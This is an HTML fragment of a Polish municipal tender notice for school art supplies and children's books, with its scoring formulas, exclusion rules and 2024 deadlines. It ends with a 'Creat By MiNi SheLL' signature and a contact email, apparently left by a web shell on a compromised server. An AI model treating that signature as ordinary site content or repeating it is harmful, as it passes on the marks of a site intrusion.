punktów w określonych powyżej kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 zamówienia - przedmiotem zamówienia jest dostawa pomocy do wykonywania prac plastycznych do realizatora projektu Zespołu Szkół Ogólnokształcących Nr 1 im. Powstańców 1863r. w Sędziejowicach, ul. Powstańców 1863 r. nr 6, 98 – 160 Sędziejowice. Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane. Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladu uszkodzenia, w oryginalnych opakowaniach producenta, z widocznym logo, symbolem produktu. Dostarczone materiały muszą być zgodnie z obowiązującymi normami i posiadać wymagane atesty, certyfikaty, aprobaty techniczne, deklaracje zgodności, świadectwa bezpieczeństwa, homologacje, licencje itp.<br/>Skład zestawu:<br/>1. Papier biały 20 ryz, format A4,<br/>2. Kolorowy papier miks format A4 10 ryz,<br/>3. Klej w sztyfcie: 120 sztuk,<br/>4. Pisaki 20 opakowań po minimum 10 kolorów,<br/>5. Farby plakatowe 1 litr, 6 kolorów – 2 komplety,<br/>6. Pędzle do malowania 50 sztuk,<br/>7. Klej brokatowy: 10 opakowań minimum 4 kolory w opakowaniu,<br/>8. Bibuła 30 ryz, minimum 7 kolorów w opakowaniu,<br/>9. Glina samoutwardzalna – 5 kg,<br/>10. Arkusz szarego papieru - 126 x 105 cm – 50 arkuszy,<br/>11. Brystol miks arkuszy, format minimum A3, minimum 10 opakowań,<br/>12. Kalka – 2 opakowania,<br/>13. Kredki świecowe 20 opakowań po minimum 10 kolorów,<br/>14. Kredki ołówkowe 20 opakowań po minimum 15 kolorów,<br/>15. Plastelina 20 opakowań po minimum 6 kolorów,<br/>16. Filc – 5 opakowań, miks kolorystyczny,<br/>17. Talerze papierowe – 200 sztuk,<br/>18. Kreda – 10 opakowań, minimum 4 kolory w każdym opakowaniu,<br/>19. Ryż – 10 kg,<br/>20. Klej w tubce o mocnym i szybkim procesem wiązaniem oraz nie pozostającą plam i zabrudzeń konsystencją. 30 tubek,<br/>21. Kasza gryczana palona – 5 kg,<br/>22. Makaron – 5 opakowań rurki,<br/>23. Ocet - 10 litrów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Termin realizacji dostawy – 40%.<br/><br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”,<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom określonym w ustawie i w SWZ oraz została oceniona jako najkorzystniejsza, czyli uzyskała najwyższą ilość punktów w określonych powyżej kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7 zamówienia - przedmiotem zamówienia jest dostawa zestawu książek do realizatora projektu Zespołu Szkół Ogólnokształcących Nr 1 im. Powstańców 1863r. w Sędziejowicach, ul. Powstańców 1863 r. nr 6, 98 – 160 Sędziejowice. Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane. Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladu uszkodzenia, w oryginalnych opakowaniach producenta, z widocznym logo, symbolem produktu. Dostarczone materiały muszą być zgodnie z obowiązującymi normami i posiadać wymagane atesty, certyfikaty, aprobaty techniczne, deklaracje zgodności, świadectwa bezpieczeństwa, homologacje, licencje itp.<br/>Skład zestawu:<br/>1. „Pod ziemią, pod wodą” – 4 sztuki,<br/>2. „Ptaki świata” – 4 sztuki,<br/>3. „Nela i tajemnice świata” – 4 sztuki,<br/>4. „Encyklopedia zwierząt świata” – 4 sztuki,<br/>5. „Zwierzęta świata” – 4 sztuki,<br/>6. „Cuda natury najpiękniejsze miejsca” – 4 sztuki,<br/>7. „Cuda świata” – 4 sztuki,<br/>8. „Atlasy świata” – 4 sztuki,<br/>9. „Ilustrowany atlas dla dzieci” – 4 sztuki,<br/>10. „Cuda kultury” – 4 sztuki,<br/>11. „Najpiękniejsze baśnie Europy” – 4 sztuki,<br/>12. Czytanki dla dzieci – różne rodzaje 15 sztuk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Termin realizacji dostawy – 40%.<br/><br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”,<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom określonym w ustawie i w SWZ oraz została oceniona jako najkorzystniejsza, czyli uzyskała najwyższą ilość punktów w określonych powyżej kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenia Wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2024r. poz. 594), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ.<br/> b)	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w dziale XXI pkt 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw do wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany niniejszej umowy wymagają sporządzenia aneksu w formie pisemnej, pod rygorem nieważności. <br/>2.	Zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość wprowadzenia zmian postanowień niniejszej umowy w stosunku do treści złożonej oferty, w przypadkach opisanych w niniejszym paragrafie.<br/>3.	Dopuszczalna jest zmiana terminu wykonania umowy w przypadku: <br/>a.	wystąpienia okoliczności lub zdarzeń uniemożliwiających realizację w wyznaczonym terminie przedmiotu umowy, bez możliwości usunięcia <br/>lub likwidacji powyższych okoliczności lub zdarzeń, za które nie odpowiada Wykonawca<br/>b.	wystąpienie siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego o charakterze wyjątkowym, które było niemożliwe <br/>do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności. Siłą wyższą̨ nie są̨ w szczególności: deficyt sprzętowy, kadrowy, materiałowy, spory pracownicze, strajki, trudności finansowe ani też kumulacja tych czynników.<br/>4.	Zmiana umowy w zakresie terminów jest dopuszczalna stosownie do okresu trwania przeszkody.<br/>5.	Strona, która występuje z propozycją zmiany umowy, w oparciu o przedstawiony powyżej katalog zmian umowy zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę. Zamawiający przewidział katalog zmian umowy, na które mogą powoływać się strony niniejszej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_sedziejowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com